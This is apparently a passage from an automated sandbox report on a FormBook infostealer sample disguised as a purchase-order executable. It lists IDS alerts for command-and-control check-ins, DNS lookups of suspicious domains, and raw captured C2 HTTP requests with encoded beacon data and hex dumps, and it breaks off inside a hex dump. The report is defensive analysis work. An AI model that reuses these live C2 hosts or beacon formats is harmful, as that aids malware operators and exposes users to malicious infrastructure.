            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49756 -> 154.38.114.205:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49757 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49758 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49731 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49710 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49725 -> 198.50.252.64:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49749 -> 154.198.53.36:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49722 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49708 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49724 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49743 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49750 -> 154.198.53.36:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49747 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49727 -> 198.50.252.64:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49732 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49738 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49719 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49730 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49715 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49713 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49733 -> 142.250.186.51:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49745 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49721 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49748 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49755 -> 154.38.114.205:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.rtpngk.xyz
            Source: DNS query: www.shopdj00.xyz
            Source: DNS query: www.085bet.xyz
            Source: Joe Sandbox ViewIP Address: 198.50.252.64 198.50.252.64
            Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /ye3m/?mtJD_=fvdlJ2L&76=BO45+0u1emCE8p481TGhlGJRfjijEniKMfSBNkuCyA4PSNUX9OtmTTSsRjXRpS6xcva9ZoEmbKYu7sV13UJQ2VHV0V6wg3gLfDQvPBhIAhk7jspRbUMiRCt8g415t+g4yzmjfyP2O5kn HTTP/1.1Host: www.kovallo.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L HTTP/1.1Host: www.tempatmudisini01.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /2lu6/?76=PbAz0EfTKowYn11d9L8KeIyoxyngBHbvlbcT88jVQuwl479Ud/v94CC+Ex+uZY8Wq5vHWUIm1erRj2VcHYbUz5WJs9RaUjKCQ9bJpumP+lrR5hAi4gPt8UgQTkM/uAhjmqXAbZ9LXA/l&mtJD_=fvdlJ2L HTTP/1.1Host: www.zz82x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo2Uxd0f+FrZwD+wtTCitgNQzIzPqlhTclUhz8bxA3FGZPimHZW40XTk/UgPnbZQA2uTwzCdxs&mtJD_=fvdlJ2L HTTP/1.1Host: www.rtpngk.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /7m8b/?76=TUpvsdJ0cs84UNNTqqi2wOMj02pU6E0u1A17Lrv5qeBoN9jB/n++wLdBNnRIp/FdR+Ur2HOcuniO4FwpOA1JnwQ/5G5V4geMmZeqJSORp3yZ3MMA5ZHYDD9/sYl5a677eMHhDnCl+rJp&mtJD_=fvdlJ2L HTTP/1.1Host: www.bluegirls.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /r48b/?76=+EEyxXn2ifp2lL4tSgcDej4IKTVVubAXRia9ZGYNaFbCIrCUSrCroJ1ltkc3MgDLuvAkyd1hc3+ySf3CEzuTuCrdjxUcb6kt1JtpL21e+JT78DJZMGSekOhJaCk+Ht+qyblm0D0jZ5Dr&mtJD_=fvdlJ2L HTTP/1.1Host: www.mistsui.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /s5b1/?mtJD_=fvdlJ2L&76=Yf0zZ3jBoCdhuzLDLj91Ws8HprJqzGXqNpWi9hWRQAr/e4SYtEvUr1BCdCQtsdxZ1OdzkDb6zzma4zXRjMwopMxEpmqXXuUrncqDeB64G5UYzEp6MWYeviVvJyEh+kzS7xrr7DyksnLe HTTP/1.1Host: www.solisbysobha.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /hel6/?76=o5DytMykkaK7sxNXVTYwbJ0nas7Lrf6+xSFmwBlJgutuTdBVL+3Ld5pnGP5bgJpbKreJsN3lh4gHWJ53LIGu8bA2yj0UpLyBdZ5DgjAe+Y8tl6D74j+Er65lZkEVlLJH6zUxwY6EHphi&mtJD_=fvdlJ2L HTTP/1.1Host: www.sppsuperplast.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCbgQwpMWpgmK77FhrxpjTuP7OZT72bn7m/6/2woT1FIIWI10rq/bHfXKD/PO7OFh2Gu8aqkRsDAe&mtJD_=fvdlJ2L HTTP/1.1Host: www.deefbank.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /8dtf/?76=n4Dn6BhRGXgBCc8VvzeMEOXmG0Elz5lGLePoshfoMkwgvj9XBMT8fCSzJRDbu+yD5cpoNGctvaCBzFD7eo0ZE+1Jdoxfd5POcRUtDqQJ70nv82NNqRSJamvbeDYUZbHlz6Y0RwscVapw&mtJD_=fvdlJ2L HTTP/1.1Host: www.donante-de-ovulos.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /uesf/?76=z4JBjkhdawOvrgQ3/n9w4VhuG3+mvNpQWeVdJRkYJDu2YFtbuhkNmpkohWu/kto2VaQ1uMJYrSrWzkHi22xejudxEXfvpm+SoyIUt5G98Vt9xyNVSrHPgcfLvBC9CdBqRcbgarcrONxp&mtJD_=fvdlJ2L HTTP/1.1Host: www.chalet-tofane.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /gxfy/?76=CIIanhHRMgNozks5RGfJdUNX3+emzbgNf/VP7kRsN6vN0WzMvG3G9UIg+8jiJKvurCAh0c8eANy2Q8bdeXyR4StCmoJcjfzG5pIm3u+OPQ8SG4xTUPnFxO8c++BkIyDygdbta7ejYT5g&mtJD_=fvdlJ2L HTTP/1.1Host: www.greekhause.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /1zd7/?76=bC1YIRSSuZYlVnS9hsNuhorKbcQ6ntdnx8KhpmCqECpWzN5SjPNMNLi+QdUYzo4UT/zMJg8CHwvIOMobHOZol4uZ599UMLQvIcSN6ebgMaMOQVLVUFO0QXCtqgKNb3wKU9pkkDiIxWQO&mtJD_=fvdlJ2L HTTP/1.1Host: www.085bet.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /xedw/?mtJD_=fvdlJ2L&76=iU86b+DQDkc5+HCYi3wksyID7wIiKcPt1qIOrYUg5TrYQuRHlXYNPzVksVl/dHByk+JFXw+Aj1EfBi5c9qhjsEIOS1JRVa1wxHxBhUP989bRn8j6x1DUcRzlbseaRz6IPahZbjf8tblS HTTP/1.1Host: www.2024tengxun361.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficHTTP traffic detected: GET /8xob/?76=A14vC586VW4zZwTD5W+icFgZA3/gFFWkfN+k13nedPAvAgeoNHQOmzzfD2mClB7mOSU9pQTtzUjUfjrPrdgjVCIgZM4LbXLF8ymXXAVuMS/ObX4kzH9c4ewBdY7tnGrMOo/XDCkVFvSq&mtJD_=fvdlJ2L HTTP/1.1Host: www.bodegamayorista.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
            Source: global trafficDNS traffic detected: DNS query: www.kovallo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini01.click
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.rtpngk.xyz
            Source: global trafficDNS traffic detected: DNS query: www.bluegirls.blog
            Source: global trafficDNS traffic detected: DNS query: www.mistsui.top
            Source: global trafficDNS traffic detected: DNS query: www.solisbysobha.net
            Source: global trafficDNS traffic detected: DNS query: www.sppsuperplast.online
            Source: global trafficDNS traffic detected: DNS query: www.deefbank.net
            Source: global trafficDNS traffic detected: DNS query: www.shopdj00.xyz
            Source: global trafficDNS traffic detected: DNS query: www.donante-de-ovulos.biz
            Source: global trafficDNS traffic detected: DNS query: www.chalet-tofane.net
            Source: global trafficDNS traffic detected: DNS query: www.greekhause.org
            Source: global trafficDNS traffic detected: DNS query: www.085bet.xyz
            Source: global trafficDNS traffic detected: DNS query: www.2024tengxun361.buzz
            Source: global trafficDNS traffic detected: DNS query: www.bodegamayorista.online
            Source: unknownHTTP traffic detected: POST /phdl/ HTTP/1.1Host: www.tempatmudisini01.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.tempatmudisini01.clickContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 215Connection: closeReferer: http://www.tempatmudisini01.click/phdl/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11Data Raw: 37 36 3d 63 59 30 74 50 74 6e 51 4a 2b 2f 32 5a 62 4b 45 36 59 49 32 62 46 4b 38 55 44 69 68 53 69 38 38 37 4b 6e 71 63 59 2f 77 63 36 78 67 73 48 38 36 6e 6e 67 77 30 77 6e 30 77 6c 7a 58 6d 32 39 44 71 42 42 55 75 66 57 43 78 75 6e 43 2f 34 6f 73 45 4c 4f 57 67 64 51 53 34 47 59 65 79 67 30 58 49 6a 41 4c 34 71 72 6f 67 75 4b 52 50 55 4c 64 73 57 6b 66 41 38 36 30 72 59 32 54 73 43 71 67 2b 65 32 36 53 61 62 4a 43 2f 6e 52 45 4a 32 39 32 33 67 30 76 6a 55 37 68 59 6e 6a 50 30 33 59 56 6a 6d 2b 63 71 42 38 6f 53 48 62 68 70 30 77 4d 72 55 6b 79 68 77 4f 49 58 74 46 64 75 43 6e 2f 6d 79 78 38 71 68 7a 64 67 69 66 50 55 4e 4e 41 67 3d 3d Data Ascii: 76=cY0tPtnQJ+/2ZbKE6YI2bFK8UDihSi887KnqcY/wc6xgsH86nngw0wn0wlzXm29DqBBUufWCxunC/4osELOWgdQS4GYeyg0XIjAL4qroguKRPULdsWkfA860rY2TsCqg+e26SabJC/nREJ2923g0vjU7hYnjP03YVjm+cqB8oSHbhp0wMrUkyhwOIXtFduCn/myx8qhzdgifPUNNAg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:36:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 894_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Mon, 23 Sep 2024 12:37:14 GMTserver: LiteSpeedData Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 a2 3b 25 f5 33 38 54 d5 ac d1 9e 9e 85 fd 5a 42 7d 9c ed cb c1 0a 07 12 a1 c2 17 41 78 3d d2 5a 04 69 74 c6 73 07 f2 d2 b0 73 b7 6d c1 6f 88 cd c0 8d 65 b0 7f ef 59 8b d8 64 84 ae a3 ec 67 d3 75 a8 83 27 50 0a a2 46 69 ca ef 14 a1 c7 2e 3a 3f fd db f8 34 58 ec cc 57 f9 1e 43 90 fa e0 a1 82 91 ec 85 c7 8f 4e 91 32 92 e3 3e 64 0f 99 67 03 33 ee f0 b0 2a 4d b7 87 ac 36 0e 1f 32 04 2f e3 43 96 2f 19 67 f3 87 6c 5d 9c d7 c5 43 46 52 82 e7 40 4a 72 fa 8b e7 43 4a fc e9 80 33 eb 4f 87 8f 36 7f 3a fc fa fd 2e 7f ba 24 d3 bb 1a 49 39 92 da e8 5a 84 a0 82 66 88 c2 22 97 67 3e 64 83 a5 15 40 ee 21 fb ea 67 42 bc 77 9c 3a 54 28 3c b2 4e 6a f6 d5 7f 7f 42 57 ad d8 8a 15 e4 7a dd 46 d9 cb 9b 7d 36 9c 5c 2b 15 82 f4 20 fa 60 e8 be 01 e6 c6 06 5e 66 d1 cd ca 3f 97 1b cb 54 27 e3 49 38 30 a9 4f 71 bb ac 3b d4 31 26 63 70 97 e5 ad a1 1a f7 6b b8 d0 07 f4 c1 97 98 b6 22 e9 b2 ae 6e 4c d8 61 f0 fe 14 5e b7 71 72 dd 7a f4 5e 1a fd 3e 18 27 0e c8 3c 86 3f 03 76 b1 49 ff 7a ff fa 3f cc 07 27 f5 41 b6 97 38 24 c9 b5 52 6e 1d af 57 12 7e 5e 1b 63 1a 52 9d 8c c8 f6 4e 7d 2d de 61 1d 62 9e f2 14 59 2d f4 49 78 56 5f a8 59 72 d7 96 d7 2a 49 91 b5 52 a9 0f 78 0e 71 48 79 ca 93 6d 22 de a0 35 0e f0 51 ea 30 2f 7e 74 4e 5c 62 64 Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 894_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Mon, 23 Sep 2024 12:37:16 GMTserver: LiteSpeedData Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 a2 3b 25 f5 33 38 54 d5 ac d1 9e 9e 85 fd 5a 42 7d 9c ed cb c1 0a 07 12 a1 c2 17 41 78 3d d2 5a 04 69 74 c6 73 07 f2 d2 b0 73 b7 6d c1 6f 88 cd c0 8d 65 b0 7f ef 59 8b d8 64 84 ae a3 ec 67 d3 75 a8 83 27 50 0a a2 46 69 ca ef 14 a1 c7 2e 3a 3f fd db f8 34 58 ec cc 57 f9 1e 43 90 fa e0 a1 82 91 ec 85 c7 8f 4e 91 32 92 e3 3e 64 0f 99 67 03 33 ee f0 b0 2a 4d b7 87 ac 36 0e 1f 32 04 2f e3 43 96 2f 19 67 f3 87 6c 5d 9c d7 c5 43 46 52 82 e7 40 4a 72 fa 8b e7 43 4a fc e9 80 33 eb 4f 87 8f 36 7f 